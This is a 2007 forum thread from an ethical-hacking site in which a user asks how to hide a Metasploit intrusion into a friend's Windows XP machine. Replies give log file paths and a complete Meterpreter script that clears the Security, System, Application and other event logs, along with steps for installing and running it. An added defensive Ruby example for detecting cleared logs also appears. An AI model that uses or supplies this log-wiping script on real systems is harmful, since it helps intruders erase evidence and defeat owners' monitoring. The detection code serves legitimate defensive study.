EH-Net
Author Topic: Beginning Pen Tester  (Read 9237 times)
xXxKrisxXx
« on: December 23, 2007, 03:30:15 PM »

Sup Everyone?
Had a basic question or so, was wondering if anyone could aim me in the right direction.
A buddy of mine and I have developed a small scheme to see which of us can access each other's computers first without any type of alarm triggering. I can bypass into his with his permission using an exploit in the Metasploit Framework, however I'd like to be a bit stealthier. I don't have any custom scripts, but I was wondering, which files in a Windows XP machine should be deleted or cleared (meaning log-wise, provide a path for me if you can) so when he looks through his logs, he wouldn't be able to tell I was Any advice would help guys, thanks, and Happy Holidays.
Logged

OSCP, OWSP, eCPPT
boney
« Reply #1 on: December 24, 2007, 10:54:10 AM »

Hi KrisTeason,
Well, I don't have enough expertise on Metasploit, but regarding the logs, I guess it comes under the DataStore system called LogLevel. You have to manually enable this feature. The log files are stored in the directory of the user's configuration directory ( /.msf3/logs).
Hope that helps.

Happy holidays
Logged

C|EH

All my life I wanted a computer...
Now I want my life back !
Kev
« Reply #2 on: December 24, 2007, 02:50:43 PM »

If you are just talking about XP, then it's rather simple. On your own machine check out the Event Viewer by going to the control panel and then computer management. This will show you the normal default logging. Also check C:\WINDOWS\pfirewall.log for firewall logs, but this needs to have been activated by the user, as do some of the other logging events in XP. The firewall log is activated under the Advanced tab once you click the firewall icon in the control panel.
Logged
xXxKrisxXx
« Reply #3 on: December 24, 2007, 04:03:23 PM »

Thanks for both your guys' responses. Thanks also to Kev for providing that path to the firewall log. I was also wondering if there are any more logs that could be cleared/deleted using the meterpreter, I'm trying to make sure my homie doesn't catch me here.
Logged

OSCP, OWSP, eCPPT
LSOChris
Guest
« Reply #4 on: December 24, 2007, 09:28:42 PM »

here's a meterpreter script to take care of it for you.

Quote
# clears ALL the event logs  - chris [] learnsecurityonline [] com
#
# Event 517 is logged whenever the Security log is cleared, REGARDLESS of
# the status of the Audit System Events audit policy.


print_line("Clearing the Security Event Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

print_line("Clearing the System Event Log\n")
log = client.sys.eventlog.open('system')
log.clear

print_line("Clearing the Application Event Log\n")
log = client.sys.eventlog.open('application')
log.clear

print_line("Clearing the Directory Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('directory service')
log.clear

print_line("Clearing the DNS Server Event Log (If It Exists)\n")
log = client.sys.eventlog.open('dns server')
log.clear

print_line("Clearing the File Replication Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('file replication service')
log.clear

print_line("Done... Have a lovely day :-)")
Logged
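
Added example, not part of the original thread or of the script quoted above: the script's own comment notes that clearing the Security log leaves event 517, and that is what the machine's owner can look for. This Ruby sketch scans an exported event list for clear events and flags any other log whose oldest surviving record starts within a few minutes of one. The CSV layout, the account name and the sample rows are constructed for illustration; 1102 and 104 are the Vista-and-later IDs for the same action.

```ruby
require 'csv'
require 'time'

# [log, event id] pairs that record a log being cleared. 517 is the ID named
# in the script comment above; 1102 and 104 are the Vista-and-later IDs.
CLEAR_EVENTS = {
  ['Security', 517]  => 'Security log cleared (XP/2003)',
  ['Security', 1102] => 'Security log cleared (Vista and later)',
  ['System', 104]    => 'An event log was cleared (Vista and later)'
}.freeze

# Constructed sample export (hypothetical column layout and account name).
SAMPLE = <<~'CSV'
  log,time,event_id,user
  Security,2007-12-24T21:40:02Z,517,LAB\tester
  Security,2007-12-24T21:40:09Z,538,LAB\tester
  System,2007-12-24T21:40:03Z,6009,
  Application,2007-12-20T08:00:00Z,1000,
  Application,2007-12-24T21:41:00Z,1001,
CSV

def parse_events(csv_text)
  CSV.parse(csv_text, headers: true).map do |r|
    { log: r['log'], time: Time.parse(r['time']),
      id: r['event_id'].to_i, user: r['user'] }
  end
end

# Explicit evidence: the clear events themselves.
def find_clears(events)
  events.select { |e| CLEAR_EVENTS.key?([e[:log], e[:id]]) }
end

# Heuristic: a log with no clear event of its own whose oldest surviving
# record falls within `window` seconds of a clear event elsewhere was
# probably emptied in the same session.
def suspect_truncated_logs(events, window: 300)
  clears = find_clears(events)
  events.group_by { |e| e[:log] }.select do |log, evs|
    next false if clears.any? { |c| c[:log] == log }
    oldest = evs.map { |e| e[:time] }.min
    clears.any? { |c| (oldest - c[:time]).abs <= window }
  end.keys
end

if __FILE__ == $PROGRAM_NAME
  events = parse_events(SAMPLE)
  find_clears(events).each do |e|
    puts "#{e[:time].utc.iso8601} #{CLEAR_EVENTS[[e[:log], e[:id]]]} by #{e[:user]}"
  end
  puts "Possibly emptied alongside: #{suspect_truncated_logs(events).join(', ')}"
end
```

Forwarding events to a second host as they are written keeps a copy that a local clear cannot remove, so the 517 record is not the only evidence left.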
xXxKrisxXx
« Reply #5 on: December 24, 2007, 09:38:12 PM »

Thanks Gates, All I Need To Do Is Learn How To Put This Script Into The MSF, it'd be useful for someone to aim me that way, if it's not too much trouble
Logged

OSCP, OWSP, eCPPT
LSOChris
Guest
« Reply #6 on: December 25, 2007, 07:54:22 AM »

well since it's christmas...

http://www.ethicalhacker.net/content/view/136/24/

the script goes into your scripts/meterpreter directory.

so for me it's:

cg@segfault:~/evil/msf3/scripts/meterpreter$ pwd

/home/cg/evil/msf3/scripts/meterpreter

once you get it in your scripts/meterpreter/ directory you can invoke the script by running it within your meterpreter shell.

meterpreter> run clearalllog


there are some videos on EH.net and LearnSecurityOnline.com if you need some more help

-Chris
Logged
xXxKrisxXx
« Reply #7 on: December 25, 2007, 02:13:54 PM »

Thanks man,
You all have a good christmas.
Logged

OSCP, OWSP, eCPPT
vital
« Reply #8 on: January 01, 2008, 02:36:50 AM »

Hello guyz,

How can I know my password if I forgot, like in a Yahoo account - all the details on my account I have forgotten, how can I retrieve it again? Then the next is: how can I retrieve my password again on my laptop, Windows XP and Vista, administrator?

tnx guyz

L30
Logged
proudindian
« Reply #9 on: January 01, 2008, 03:06:50 AM »

Actually I don't think by Metasploit without permission you can't break into his system..... am I right??
Logged
LSOChris
Guest
« Reply #10 on: January 01, 2008, 07:11:03 AM »

Quote
Hello guyz,

How can I know my password if I forgot, like in a Yahoo account - all the details on my account I have forgotten, how can I retrieve it again? Then the next is: how can I retrieve my password again on my laptop, Windows XP and Vista, administrator?

tnx guyz

L30

I think you need to return that laptop to its rightful owner
Logged
don
« Reply #11 on: January 01, 2008, 01:35:46 PM »

... and don't hijack a legitimate thread.

Don
Logged

CISSP, MCSE, CSTA, Security+ SME